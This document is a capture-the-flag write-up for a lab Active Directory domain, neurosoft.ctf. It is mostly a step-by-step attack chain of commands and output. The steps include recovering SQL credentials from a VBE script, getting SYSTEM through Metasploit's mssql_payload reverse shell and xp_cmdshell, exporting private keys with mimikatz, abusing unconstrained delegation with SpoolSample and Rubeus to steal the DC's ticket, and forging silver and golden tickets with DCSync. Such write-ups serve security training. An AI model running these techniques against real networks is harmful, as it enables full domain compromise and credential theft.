Recon the first AD: dc.neurosoft.ctf

As in every pentest assessment, as soon as host recon is completed and that a domain account is compromised, a logical next step consist of running reconnaissance activities on the Domain.

Metasploit has most of the tools to perform recon. However, PowerSploit is much simpler to use. Here are a few one-liners inspired from Harmj0y’s cheatsheet.

meterpreter > load powershell

meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1



## Computers

Get-DomainComputer

Get-DomainComputer -domain nsresearch.ctf



## Groups

Get-DomainGroup -Properties name,description,whencreated

Get-DomainGroup -Properties name,description,whencreated -domain nsresearch.ctf



## Groups Membership

Get-DomainGroupMember 'Domain Admins'

Get-DomainGroupMember -domain nsresearch.ctf 'Domain Admins'



## Users

Get-DomainUser -Properties sAMAccountName,description

Get-DomainUser -Properties sAMAccountName,description -domain nsresearch.ctf



## Trusts

Get-DomainTrust



## SPNs

Get-DomainUser -SPN



## Delegation

Get-DomainComputer -Unconstrained

Get-DomainUser -AllowDelegation -AdminCount

Get-DomainComputer -domain nsresearch.ctf -Unconstrained

Get-DomainUser -domain nsresearch.ctf -AllowDelegation -AdminCount

Pwn svc.neurosoft.ctf

To get access to svc.neurosoft.ctf, the player first needed to decrypt the VBE located in C:\Users\brandon.harper\Documents\sqldev grab credentials and connect to the MSSQL server. From there, the player could escalate to SYSTEM by enabling xp_cmdshell and uploading a payload.

Here are the detailed steps.

Find the file

... [perform recon] ...



C:\Users\brandon.harper>dir Documents\sqldev

dir Documents\sqldev

Volume in drive C has no label.

Volume Serial Number is 843E-DDE5



Directory of C:\Users\brandon.harper\Documents\sqldev



2019-04-14 08:40 PM <DIR> .

2019-04-14 08:40 PM <DIR> ..

2019-03-23 11:37 AM 633 neurodev_sql_chips_check.vbe

1 File(s) 633 bytes

2 Dir(s) 21,332,369,408 bytes free

Find creds in VBE script

The player could decode the VBE by running publicly available tools. We did it with this one.

The simplest approach was to upload the vbs script on the machine and then decode it.

meterpreter > upload /home/mdube/shr/git/ctf-2019/challenges/mdube_sigs/DEV_sqldev_vbe/decode_vbe.vbs

meterpreter > shell

C:\temp>cscript decode_vbe.vbs C:\Users\brandon.harper\Documents\sqldev

eurodev_sql_chips_check.vbe



Const adOpenStatic = 3

Const adLockOptimistic = 3



Set objConnection = CreateObject("ADODB.Connection")

Set objRecordSet = CreateObject("ADODB.Recordset")



objConnection.Open _

"Provider=SQLOLEDB;Data Source=svc.neurosoft.ctf;" & _

"Initial Catalog=neurodevdb;" & _

"User ID=sa;Password=FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ;"



objRecordSet.Open "SELECT * FROM DevChipTargets", _

objConnection, adOpenStatic, adLockOptimistic



objRecordSet.MoveFirst



Wscript.Echo "Number of neurochips deployed: ",objRecordSet.RecordCount,vbCrLf

Get a SYSTEM shell (Solution #1)

The mssql_payload module from metasploit still works very well after all these years.

use windows/mssql/mssql_payload

set SRVHOST ::

set RHOSTS 9000:470:beef::11

set PASSWORD FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ

set PAYLOAD windows/x64/meterpreter_reverse_ipv6_tcp

set DisablePayloadHandler true

set LHOST <your_ipv6>

set LPORT 8081

run #or use windows/mssql/mssql_payload

set SRVHOST ::1

set RHOSTS 9000:470:beef::11

set EXE::Custom /payloads/c2nsec/payload_msf_x64.exe

set DisablePayloadHandler true

set PASSWORD FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ

run

The player could grab the flag here: C:\flag.txt .

meterpreter > cat C:\\flag.txt FLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

Get SYSTEM shell (Solution #2)

The second solution involves impacket. If you don’t know this collection of python scripts and classes, you should take time to read on it.

$ mssqlclient.py sa:FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ@svc.neurosoft.ctf SQL> enable_xp_cmdshell [*] INFO(SVC): Line 185: Configuration option ‘show advanced options’ changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(SVC): Line 185: Configuration option ‘xp_cmdshell’ changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> xp_cmdshell whoami nt authority\system

The player could grab the flag here: C:\flag.txt .

SQL> xp_cmdshell type c:\flag.txt FLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

[Optional] Flag in the encrypted column

There was three ways to get this flag.

Solution 1 (The easy way with CLI)

This step needed to be performed from NEUROSOFT\brandon.harper because the encryption key for the column ImplantPass was in stored in his certificate hive.

Use sqlcmd tool with -g option to activate column decryption with the certificate already in the user store.

meterpreter > shell

C:\temp>sqlcmd -S svc.neurosoft.ctf -U sa -P FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ -g



sp_databases

GO



DATABASE_NAME

-------------------------------------------------------------------------

model

msdb

neurodevdb

tempdb



select table_name, column_name from neurodevdb.information_schema.columns

GO



table_name column_name

-------------------------------------------------------------------------

DevChipTargets ChipVesion

DevChipTargets ImplantPass

DevChipTargets Name



(3 rows affected)



USE neurodevdb

select * from DevChipTargets

GO



Changed database context to 'neurodevdb'.

Name ChipVesion ImplantPass

-------------------------------------------------- ---------- --------------------------------------------------

Serenity Cunningham 1.0 31xKOjmqrGhF5plExKwB

Usaamah Barron 0.9 YJmi6v9qH5rFiioZW5oh

Oriana Sheldon 1.0 31xKOjmqrGhF5plExKwB

Juliet Regan 1.1 gvSzEbzwy3665PlMgJkz

Manahil Butt 1.0 31xKOjmqrGhF5plExKwB

Charly Farrow 2.0 DMB6sYhEWd7SvzcKZqhv

Andreas Welsh 1.1 gvSzEbzwy3665PlMgJkz

Daanyal Obrien 1.1 gvSzEbzwy3665PlMgJkz

Campbell Barber 1.0 31xKOjmqrGhF5plExKwB

Kaan Prince 0.9 YJmi6v9qH5rFiioZW5oh

Renesmee Cardenas 1.0 31xKOjmqrGhF5plExKwB

Caelan Mullen 0.9 YJmi6v9qH5rFiioZW5oh

Zacharias Wilkerson 0.9 YJmi6v9qH5rFiioZW5oh

Esmay Eastwood 1.1 gvSzEbzwy3665PlMgJkz

Roberta Cotton 1.1 gvSzEbzwy3665PlMgJkz

Piper Burrows 1.0 31xKOjmqrGhF5plExKwB

Deborah Cordova 2.0 FLAG-wVLX58txoVDIFacSsi7XBcS5lxPrQwL

Neil Worthington 0.9 YJmi6v9qH5rFiioZW5oh

Vivek Forrest 1.0 31xKOjmqrGhF5plExKwB

Finnian Mellor 1.1 gvSzEbzwy3665PlMgJkz

Solution 2 (The easy way with GUI)

This step needed to be performed from NEUROSOFT\brandon.harper because the encryption key for the column ImplantPass was in stored in his certificate hive. The player could use RDP and install SQL Management Studio to get the flag.

The player needed to open SQL Management Studio on the computer with imported certificate and add the line below in the advanced options.

column encryption setting=enabled

Then, by browsing to the database neurodevdb , table devchiptarget , the flag was in the Deborah Cordova entry.

Solution 3 (The hard way)

Load mimikatz module and export current user certificates.

meterpreter > load kiwi

Loading extension kiwi...

.#####. mimikatz 2.1.1 20180925 (x64/windows)

.## ^ ##. "A La Vie, A L'Amour"

## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

## \ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )

'#####' > http://pingcastle.com / http://mysmartlogon.com ***/



Success.



meterpreter > kiwi_cmd crypto::stores

Asking for System Store 'CURRENT_USER' (0x00010000)

0. My

1. Root

2. Trust

3. CA

4. UserDS

5. TrustedPublisher

6. Disallowed

7. AuthRoot

8. TrustedPeople

9. ClientAuthIssuer

10. REQUEST

11. SmartCardRoot



meterpreter > kiwi_cmd crypto::certificates

* System Store : 'CURRENT_USER' (0x00010000)

* Store : 'My'



0. Always Encrypted Auto Certificate1

Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03

Provider : Microsoft RSA SChannel Cryptographic Provider

Provider type : RSA_SCHANNEL (12)

Type : AT_KEYEXCHANGE (0x00000001)

Exportable key : YES

Key size : 2048



meterpreter > kiwi_cmd "\"crypto::certificates /store:my /export"\"

* System Store : 'CURRENT_USER' (0x00010000)

* Store : 'my'



0. Always Encrypted Auto Certificate1

Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03

Provider : Microsoft RSA SChannel Cryptographic Provider

Provider type : RSA_SCHANNEL (12)

Type : AT_KEYEXCHANGE (0x00000001)

Exportable key : YES

Key size : 2048



====================

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der

====================

MIIDNjCCAh6gAwIBAgIQTtNNsGFnPaBCVegNyFeuUTANBgkqhkiG9w0BAQsFADAt

MSswKQYDVQQDDCJBbHdheXMgRW5jcnlwdGVkIEF1dG8gQ2VydGlmaWNhdGUxMB4X

DTE5MDQxNzIxMzMyMFoXDTIwMDQxNzIxMzMyMFowLTErMCkGA1UEAwwiQWx3YXlz

IEVuY3J5cHRlZCBBdXRvIENlcnRpZmljYXRlMTCCASIwDQYJKoZIhvcNAQEBBQAD

ggEPADCCAQoCggEBANHIrKwuUk+ZL24068RsxGkFhSbxUqgYKlvR0pDyUN5f4gUZ

pbkLvyB2ltep9buWcJgDOSVmx5KXq8+9AMG4WtZ1tkV0CYVCcaK61Ub6W9nXQa59

VvIXq785GLm8gjXPv4SpV4FveqUbLItkz7xqf2y2h8faP0Fl21/srM/XsLAkgtyQ

E2ZILGATWHNlXgjoeljAI/exTFyxhGFEeudorQpSD+f3dQgEe+kBugkuNxo7czIr

Ji43khnpuchQK7z5ctsloFpB7rF/UXjEG4mlqO4AxjV3/cBCruDnRIVSLEN+0Wfc

NrBTzVM7SWwhSPDK0vU5XLqKxBAy+NEmSQM9uU0CAwEAAaNSMFAwHwYDVR0lBBgw

FgYIKwYBBQUIAgIGCisGAQQBgjcKAwswHQYDVR0OBBYEFI7p3Du6iXp8KbAm63h1

vrvbiT6lMA4GA1UdDwEB/wQEAwIFIDANBgkqhkiG9w0BAQsFAAOCAQEAKqaE9HhR

4SJgIoiFoyQSSxHr/TXAuVJQJH9HlkP/fJfcMbqzwxh3qSuEBPvw6etfmSgR2n3l

UiaM1nyz1r7LX0UEw530Rwxc61nsRNZ3z4UAhn7btQxODRhYnOibENWiK5EzdE93

RGC8iiVWrL0R6S0SMMMbZaMhJNUUQ2zRjAByWa6tV+cfp1cQZN5w3EH+Gpeeay2j

9p9puUU/W0oBq2EIciTdL3VeRBVPT61oZOwnh2jLtp93v6lPEJ5xCXd2zPEThrD4

QYTUJqOf9da+CA4IzUvVT5HGR3OZEkktoQPRyubBh9V3zC8AoV1aFrZrU8Fk6C7i

Un1d4+lL6mlQdw==

====================

Public export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der'



====================

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx

====================

MIIKPgIBAzCCCfoGCSqGSIb3DQEHAaCCCesEggnnMIIJ4zCCBgwGCSqGSIb3DQEH

AaCCBf0EggX5MIIF9TCCBfEGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcN

AQwBAzAOBAh7G7NcfwkPkwICB9AEggTYZTLwljq+dlIYkJFfAl6CJ3q6hoTVYK9x

Ljq8R2m3zmv0HP7DyhjhKv7OAoSRudUwC/lemN1F92ET47ZDKWBx6ssVAMMLTpTx

Yi3i2t7CyqbY5oTp9apb+0c7GOh+chWoGCatnH24+NK9/TWa9swSwgWVpNR8Oivf

KXGWVfCqoNFjwq+F2/oGyyMwyNI69+bRSCfyaOq5+pgibb3zmnle2X/oPKhP7/NH

TFiy7AdvYe5ZEcN+BAnuhnzSguEOey4XhnFh9gXcskkMb61OqyljRAvRLJpCCxO7

5BYeBjwLW2XhprDV2sEXrHMBBcZCqQXeggbp9fJDCLhmZ0HVm9W0FuEtDDCItw2p

wrquvBVFl8MN13wICvtgWhNP+Q13+jF5vxFHGWL54TAPT7Kt8lSfZALMW1bp3g0I

FfISwMrKGZco8hDCPvw+WOeIpOH9JxUxzb87rvebAcXl70aSs0y/ANoNgjPkjMsp

DZNYQqYbQREuHlvpTngT9X+chh0PF2RrdZeB5vf8elYlrx7cnWG1C0KLcln1qQFL

K1IXeEid86wtL4SETxyY48G03WbHy1swfRhLb//M+wvpv9o5Cez+5oBzgsqnDK5H

N4tg+uLpUg1AEd7JfeVtb2Z9ssrlivfCguu0ZEQTnojL17tLYpsYveoNrjPBaD6A

PtQ1jv4IEUakcc8a8t+5kyV68rpJXXmu1iExuSZg01YRghNv0in9a62kmRNwDwMG

h4rqPvOULXnp+9E7G7u9JznDllDtgy7WvyeBcmbedGFkF72otz4rlfHqq+zsvOiX

36RWoyeoQvskn5kAezeMGCRgtcM7kyxBO2/JhTRjLmJ+5dGtYVxHUIkeJZOUepjh

CcgRtQX45ln8EWvLtAbXh36VoITeXefu3Idu6ppJa0ubPaQ/BtX3qzQ1flqTQwWg

O0Xz9jyfYhSRWhcGM38jusAi/YXBUEYJyVdTOjYcVtIkieSNKZsGS7A005H8uAx6

IKYB/Ez0Qjw7hZNMIme1C1VcMBcISRikwmRGWhFMyPpQcKbpbrtJFoCr13mXjVWS

pP1c4Wtm+peD6D/PNip8HX2wSq41Y42xZ4dJqvE5imRmoN+Q8YL9D4BsQp9ZPlsL

AHxqcqTbBFtbVkOa0EYZ1WLFnQJSxbs0HghF/951jyE45+SZni+INKYwY0mgHpQ/

aWNgmBBfVmFJuGr9crf93EMoCZNFoWIaVUcsZV+AnMkBMvHzUkSiKWS0gRzI3NIj

ze+ZEHNBWIyJobjKRSxy99oDvCATo2hA4DHhQajEzyjDW5vA74QcFCMTMC9ItHx8

1HqRvmZVDmXGjR0spafOw4Rp134F+y0m8/E8hKUl7QqClOTZuxSF7x59TAxKZ6nQ

smJH6r4B/Kn8gbGT4oT4ejOmNVCRHkNMVzyIZwL++I5iuHHlORaxOV/CWhZ+j22N

3VnvUaaIhA+5wF4LaHreHTZJ25ZP/Hp/azbs+olVNzSQfJ8dKh1/7g3ROPnEcJgy

39MEqndgfW0gGbUjbMfkFce9QysFuviIFXaCpQIqhLnOpq5Vt2LWa5dGkDvqKoBx

bwuFtVEBcwYlfrmbLYAxl82WHZvp1kpF+rkUFcVrQRsPVGI/RORplB0jR0JyFWpG

qdX/1fB//+xZRctiqOECSzGB3zATBgkqhkiG9w0BCRUxBgQEAQAAADBdBgkqhkiG

9w0BCRQxUB5OAHQAcAAtADkAYgA0ADMAOABjAGMAOQAtADIAMgAyADAALQA0ADUA

MgBmAC0AYgA1AGYANwAtAGYANQAxADEANQBlADUAYQBkADcAOAA3MGkGCSsGAQQB

gjcRATFcHloATQBpAGMAcgBvAHMAbwBmAHQAIABSAFMAQQAgAFMAQwBoAGEAbgBu

AGUAbAAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABl

AHIwggPPBgkqhkiG9w0BBwagggPAMIIDvAIBADCCA7UGCSqGSIb3DQEHATAcBgoq

hkiG9w0BDAEDMA4ECFxfCAPaPlhJAgIH0ICCA4ijH8FFsQpW2n7hOsPjWZy4zsB7

QanQFQS5cso9vWqfaQnWrNved8TQ0UoxI0q2JkbiJ9kRdjy/9F9eNjUcSFicKUnZ

OR2eGe07HzDIThZua1aLFUi+b9DgPYbqoH3/8WsrAvdVY1wz3IEilg2HRyqhJyiy

R4VJo+Rq/G21H70KsIGTAAUIkb8j6iS2LVjwPobEnIvIzWPferNMr1cbs7e0AqZ1

e4TznvtJNxgOr9iw9cqq46hrxB/VfAQSG+0iWDkZTInk3Y89VLrVividICQCQyVF

NOqbM2hzaXBe/3/F1LRbZmvahw5WLAS+Rqj08J6punSNfTSkBbZljWGx7mGMNrsx

r4NEMgxu2zZ6WKQKKP2dn4N58hskyihishSnP5ouulOBJQLcgVKQ1oR0voM5ar4M

bCxeggEbwbN4EZaYgNYJwZDSCThu+gh8y20vrmZ6HtMYgXq4zU2p/qp4dHl4HHMH

gCoHor1lh1XVo8y6iEzsJ5UrmbRNGfDVBLCngWdXb7spznt2TI7ipzSKHQYBi5PX

8CUf79rEJxi0+ikiRz1WFSRcaX/3rVWZwwvNZErs+/lj6QdhjyHxb5NmQPqyINFd

eyAfWf42Ec/D2PwhAVzRIUfyt84UHyyQ9uEU1ca6u6cJ7Q8rwL2dypRHB4WOAXPo

Tkag+PpcJHKnbLaMR69Iq1M2e0uzMPTJ4tbG6mXjur2j1ciaNkb6qpmnXn7Zb0gH

GMLSLUqWdDt+oxc8hRsfFCdk8tvrFkkfihKFsCfv42Rm3GFdWInLrWMFNnVkmxm+

UCA0yYGy8yMmdoRzpL8dMIyDXFaCnNF6xTZ/WV74USYwENILeW84kgz7NufX5l1z

bruefaJT0elWnYo0Zn9xFQr+hGsCO8N6rY0PfxDECpj2sYkHc7/8B7H2bpO+pCB9

02lDu3DiL5s/AStVSpKHQv2plwE3GrXJWsjDrN/c87mMOyli/gn2j1j2jTxX8OIo

+vDrx9RKMgW6VJEgoyGFo0hDUIHxbtbWg4ACaxN1unyok0XTInmVJ4GXcJn0YuW3

A2ctpG7IT/J2/DEzjdCiD0kghDYYTYH75RG13WKGeLxfesWR6X9bazjmArLUP5gd

aqSDUgQlrHguUn/hSZK80II68Oc/4w8fUUoqGUPrhkDFuKwXAomgBYSHwDXzsk1N

qFHEh2GkfbfrLFmDZT0siwwA7Rb0MDswHzAHBgUrDgMCGgQUF6hZeblohdyDcaOt

sUDjSr551GMEFM/Y652JjUrkDbB674DnzdqfHI3vAgIH0A==

====================

Private export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx'

Download CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx . Import this certificate on a Windows machine with SQL Management Studios installed.

Double click on the pfx file to launch certificate import wizard

Store location: Current User

Select filename

Enter password: mimikatz

Keep option Automaticaly select …

Then open SQL Management studios and add the line below in the advanced options.

column encryption setting=enabled

Then, by browsing to the database neurodevdb, table devchiptarget, the flag was in the Deborah Cordova entry.

Status at this point

msf5 exploit(windows/mssql/mssql_payload) > sessions -lx Active sessions Id Name Type Checkin? Enc? Local URI Information Connection

— — — — — — — — — — — — — — — — — — — — — — — — — — —

1 meterpreter x64/windows 16s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49720 (9000:470:beef::12)

2 meterpreter x86/windows 14s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49721 (9000:470:beef::12)

3 meterpreter x64/windows 10s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49722 (9000:470:beef::12)

4 meterpreter x64/windows 55s ago Y ? NEUROSOFT\brandon.harper @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)

5 meterpreter x64/windows 29s ago Y ? NT AUTHORITY\SYSTEM @ SVC fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::11:54535 (9000:470:beef::11)

Pwn dc.neurosoft.ctf

At this point, the player got SYSTEM privileges on 2 out of the 3 boxes of the neurosoft.ctf domain. The only remaining box was dc.neurosoft.ctf, the Domain Controller.

Identify Vulnerability

A common approach to compromise a DC in the industry is to compromise a user that is a member of the “Domain Admin” group. However, only Administrator was member of this group and this account was not connected anywhere. In addition, his password was neither stored in a file, nor configured in a weak manner. The player needed to be creative.

C:\temp>net group “Domain Admins” /domain

The request will be processed at a domain controller for domain neurosoft.ctf. Group name Domain Admins

Comment Designated administrators of the domain Members — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Administrator

The command completed successfully.

The player should have already identified during the domain recon phase that svc.neurosoft.ctf is configured with unconstrained delegation.

meterpreter > load powershell

meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1

meterpreter > powershell_shell PS > Get-DomainComputer -Unconstrained -Properties cn,useraccountcontrol cn useraccountcontrol

-- ------------------

DC SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

SVC WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION PS > Get-DomainUser -AllowDelegation -AdminCount -Properties cn,useraccountcontrol cn useraccountcontrol

-- ------------------

Administrator NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD

krbtgt ACCOUNTDISABLE, NORMAL_ACCOUNT

Per design, we have put in place two methods to get Domain Admins privileges on the domain. Unfortunately, the second method was screwed because the password of the computer account of the Domain Controller CHANGED during the preparation of the track. You will find the details below.

Method 1 — Unconstrained Delegation

Year 2018 was a rough one for Microsoft. Harmj0y made public that Forest Trusts ARE NOT security boundaries on his blog. This article demonstrates how an attacker can compromise a Domain Controller by abusing Unconstrained Delegation (and much more).

To make it short, when a user authenticates on a server configured with Unconstrained Delegation, this server temporary save the user’s Ticket Granting Ticket (TGT) in memory for eventual delegation purpose. Here, the player could trick svc.neurosoft.ctf to authenticate to dc.neurosoft.ctf by exploiting the Printer Bug. This tool could be used to trigger the attack. To read the TGT, the player could use kekeo, mimikatz or rubeus.

For detailed explanation of advanced attacks on Windows, we invite you to take a look at harmj0y’s blog or PyroTek3’s articles.



## Download:

## Compile in Visual Studio

meterpreter > upload /payloads/vs_build/SpoolSample.exe

meterpreter > shell

C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf ## Step 1: from dev.neurosoft.ctf and loggued as brandon.harper## Download: https://github.com/leechristensen/SpoolSample ## Compile in Visual Studiometerpreter >meterpreter >C:\temp> ## Step 2: from svc.neurosoft.ctf and logged as SYSTEM

meterpreter > cd C:\\temp

meterpreter > upload /payloads/mimikatz/mimi_x64.exe

meterpreter > shell

C:\temp>.\mimi_x64.exe

mimikatz # privilege::debug

mimikatz # sekurlsa::tickets /export

mimikatz # kerberos::ptt [0;2e85a]-2–0–60a10000-DC$@krbtgt-NEUROSOFT.CTF.kirbi

or using Rubeus and channels

## Step 1: from svc.neurosoft.ctf and loggued as SYSTEM

## Upload and start Rubeus

### Rubeus needs to be compiled with .NET 4.0 (not the default 3.5)

msf> sessions -i 5

meterpreter > cd C:\\temp

meterpreter > upload /payloads/vs_build/Rubeus.exe

meterpreter > shell

C:\temp>.\Rubeus monitor /interval:3

C:\temp>^Z

Background channel 1? [y/N] y

## Download:

## Compile in Visual Studio

meterpreter > sessions 3

meterpreter > upload /payloads/vs_build/SpoolSample.exe

meterpreter > shell

C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf

C:\temp>^C

Terminate channel 1? [y/N] y ## Step 2: from dev.neurosoft.ctf and loggued as brandon.harper## Download: https://github.com/leechristensen/SpoolSample ## Compile in Visual Studiometerpreter >meterpreter >meterpreter >C:\temp>C:\temp>Terminate channel 1? [y/N] ## Step 3: from the same meterpreter than step 1

## Read Rubeus output

meterpreter > sessions 5

meterpreter > channel -i 1

Interacting with channel 1... [+] 2019-10-15 1:54:01 PM - 4624 logon event for 'NEUROSOFT.CTF\DC$' from '9000:470:beef::10'

[*] Target LUID: 0x31f43

[*] Target service : krbtgt UserName : DC$

...

Base64EncodedTicket : doIFDjCCBQqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQ8bDU5FVVJPU09GVC5DVEaiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU5FVVJPU09GVC5DVEajggPLMIIDx6ADAgESoQMCAQKiggO5BIIDtTFAZP4mD4iB8uHtu4jqeA5fQueLwpDi9ysiP4COp8is0ilfwXgbw6mf/yL9e4VBiteOU5cC7zyG1oizioIkBsesHViDmoJ4ugoQNhuN02XrxqSm64SfahKYSqe2Zyyok4CyNQbo+gBD+Q6ia6kYWkrCFomtJOwOWDh7Obdk7S9qVabbx8uhKCS0JLVpkF8OcfjKTqcHl+Y3xVE0M7jFFbndYy3F7kT5fzowqhINcZFuj2WFXFv4U8ciWEYsCru4TjDmt2vARepCv8CioK+mKKcFAfU4vcML6ekmB0vzGRrRbfhTwxAf/XgortYALiMzIL2AGfX80w4SAXJbUnxP+LDB4rZXAKS88biGHcd5YDGEcSiYcntFPgp4ghZPhuY6yBOnxgXosb4N9NgrynF+nWtB+0EhpN3K7T02Iv3AFWHTFNaujeg7RNYSYMOLIKRy+9FDqa+FFC8eEuYapgHv/CijgdPamNu5Vmw+j83OuE1suAvx8j29dcqomyunEAriecH0xmUIC/RUrQiBEjJFAOPnlszTjhrP80zIrvgGJIMicRcKZFIWS3A+gUal8zF+HydI+eCCycRD0570KaD5u7i3aS7PGSkeWSDbfNTA9rYEB45o3CLyirQsnQJRwAHFzEKEfJBO5iAWuFjq+cRM1haaZp/44tBJfUE0x7CT6Zlx095G5e6CMTbVx+Y6MW3p7KnSLhEjcqURWVq0aaINh0ntQ329B/L3ektmF/i4G4BCdozqv64yO1tqRlEvM1bQWHBgo54Xc+5303Slp8zOlviKyEPaslQpaWYUqq1XZZ4QqfGUzSyrCpGY1+EF66auFasXq97tZ3uu3RaDppZb3Dq4UwEEZRKjDUWTf0DmjfwOw9psqHkZZEPoN5PUHaJh94BC+Zu+Qz3cBQJ7SlHbQtfM+R5f76dEFMZm3HPZW/9uC0Kr0IVMKoO3Y5ipmUTcTx719O/f9X+XuEtAKywm8K18fEJh5vu1qSIkv3C8JnN5lVV+YA2lQ++ocX5EhOu1C3NkZ4R/M/L/qSy28LontMlpJ+wD8kAXnV6Hn/2LuFMqSK31qmlHipCkjJX5lFfJZ5cgQVY9KmPhk4QZ37aNd+DIxG64S0LxwsD2IUWTR7hHsr1+W6FtwwTZeXGmAYX8MGTXHQkDsUTB3BaoM+8jIc1nJtEht5DZB35RJNGPibkvoEbwo6/WPBuj9drhmptzk+r+X7+8I/OwqdIPVnNPa3CQTGIN339xmyBPtAeR44FgpWu2r12jgeQwgeGgAwIBAKKB2QSB1n2B0zCB0KCBzTCByjCBx6ArMCmgAwIBEqEiBCBsDLMnnKKamKNXf9gpgLBY7gssu2uNhlpBcqTmUQbK4aEPGw1ORVVST1NPRlQuQ1RGohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMTkxMDE1MTcyODUwWqYRGA8yMDE5MTAxNjAzMjg1MFqnERgPMjAxOTEwMjIxNzI4NTBaqA8bDU5FVVJPU09GVC5DVEapIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU5FVVJPU09GVC5DVEY= [*] Extracted 1 total tickets meterpreter > shell

C:\temp>.\Rubeus.exe ptt /ticket:<the base64 ticket> [*] Action: Import Ticket

[+] Ticket successfully imported!

Method 2 — Silver Ticket via a backup service (broken)

Steal BackupSVCUser ticket.

meterpreter > upload /payloads/mimikatz/mimi_x64.exe

meterpreter > shell

C:\temp>.\mimi_x64.exe

mimikatz # privilege::debug

mimikatz # sekurlsa::tickets /export

mimikatz # kerberos::ptt [0;6f015]-2–0–60a10000-BackupSVCUser@krbtgt-NEUROSOFT.CTF.kirbi

Access SVCbackups on dc.neurosoft.ctf. Get flag.txt and preDCbak folder content.

C:\temp>dir \\dc.neurosoft.ctf\SVCbackups Directory of \\dc.neurosoft.ctf\SVCbackups 2019–03–23 03:25 PM <DIR> .

2019–03–23 03:25 PM <DIR> ..

2019–03–23 03:25 PM 35 flag.txt

2019–03–23 03:23 PM <DIR> preDCbak

1 File(s) 35 bytes

3 Dir(s) 44,482,936,832 bytes free

Copy registry files from preDCbak folder. Extract DC machine account hash with secretsdump.py from impacket.

$ secretsdump.py -system system.save -security security.save -sam sam.save LOCAL …

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:db26062ffbf19e6492f4baa3a5109344

…

To build a silver ticket, the player first needed the domain SID. He could get it either with a shell command or with PowerView.

# From a shell

C:\temp>whoami /user USER INFORMATION

— — — — — — — — — —

User Name SID

neurosoft\... S-1–5–21–2892396748–947681171–1598779583–...

# From PowerView

PS > Get-DomainSID

Then, it was just a matter of assembling the pieces together. To perform a DCSYNC and retrieve the hash of krbtgt , the player needed to specify the ldap service.

DC$ NTLM: fffbe1d239fff71c6fb5c2996def0f8e

Domain SID: S-1–5–21–2892396748–947681171–1598779583

Domain Name: neurosoft.ctf

Service: LDAP

User: whatever

ID: whatever

Then using mimikatz , the ticket could be forged and used to act as a DC.

mimikatz # kerberos::golden /admin:IPWNEDYOU /id:1106 /domain:neurosoft.ctf /sid:S-1–5–21–2892396748–947681171–1598779583 /target:dc.neurosoft.ctf /rc4:fffbe1d239fff71c6fb5c2996def0f8e /service:LDAP /ptt mimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:krbtgt

From the silver ticket, the player could escalate to a golden ticket.

krbtgt NTLM: dd7a591aa181dc43ed2f6a509411c95f

Domain SID: S-1–5–21–2892396748–947681171–1598779583

Domain Name: neurosoft.ctf

User: whatever

ID: whatever

Then using mimikatz :

mimikatz # kerberos::golden /domain:neurosoft.ctf /sid:S-1–5–21–2892396748–947681171–1598779583 /rc4:dd7a591aa181dc43ed2f6a509411c95f /user:GetRekt /id:500 /ptt

mimikatz # exit

Grab a flag on DC

The DC$ account does not have privileges on \\dc.neurosoft.ctf\c$ .

C:\temp>klist Current LogonId is 0:0x3e7 Cached Tickets: (1) #0> Client: DC$ @ NEUROSOFT.CTF

Server: krbtgt/NEUROSOFT.CTF @ NEUROSOFT.CTF

KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize

Start Time: 10/15/2019 23:17:09 (local)

End Time: 10/16/2019 9:17:09 (local)

